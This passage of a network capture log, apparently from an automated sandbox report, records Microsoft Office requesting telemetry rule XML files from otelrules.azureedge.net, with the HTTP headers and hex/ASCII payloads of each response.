2024-11-05 17:46:19 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:18 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:19 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:18 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 996d7559-c01e-0079-635c-2ee51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174618Z-17df447cdb5w28bthC1DFWgb6400000001hg00000000268y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:19 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:19 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:19 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:19 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 0401437a-901e-0015-114b-2eb284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174619Z-15869dbbcc6zbpm7hC1DFWrx5s000000023000000000em5q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:19 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49863	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:19 UTC	192	OUT	GET /rules/rule703400v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:20 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1388 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDBD9126E" x-ms-request-id: 8716aa7d-101e-00a2-3036-2f9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-15869dbbcc6tjwwhhC1DFWt1ns00000005eg00000000cmq2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:20 UTC	1388	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49865	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:19 UTC	192	OUT	GET /rules/rule702500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:20 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT ETag: "0x8DC582BDB813B3F" x-ms-request-id: bc9744fd-c01e-0014-0b55-2ea6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-15869dbbcc6lq2lzhC1DFWym6c00000000d00000000052zm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:20 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49864	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:19 UTC	192	OUT	GET /rules/rule702501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:20 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT ETag: "0x8DC582BE7C66E85" x-ms-request-id: f75e4c15-501e-0047-0155-2ece6c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-17df447cdb5jg4kthC1DFWux4n00000001pg00000000e3xd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:20 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49866	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:20 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:20 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: 09d23618-001e-000b-0deb-2b15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-16547b76f7f775p5hC1DFWzdvn00000005gg000000005hb6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:20 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49867	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:20 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:21 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: 524abde6-c01e-007a-10d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-16547b76f7fp6mhthC1DFWrggn00000005h000000000m14n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:21 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49869	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:20 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:21 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 1cb8ce88-301e-0033-7f09-2cfa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-16547b76f7fcjqqhhC1DFWrrrc00000005ag00000000w8sd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:21 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49868	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:20 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:21 UTC	515	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:20 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 62e6dde4-a01e-0084-0658-2e9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174620Z-15869dbbcc62nmdhhC1DFWa1y800000000d0000000004z0k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:21 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49870	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:21 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:21 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:21 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: d0affd2c-301e-000c-74d2-2c323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174621Z-16547b76f7f7scqbhC1DFW0m5w00000005b000000000avxv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:21 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49871	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:21 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:22 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:22 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174622Z-16547b76f7f7lhvnhC1DFWa2k0000000057g00000000zt3z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:22 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49872	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
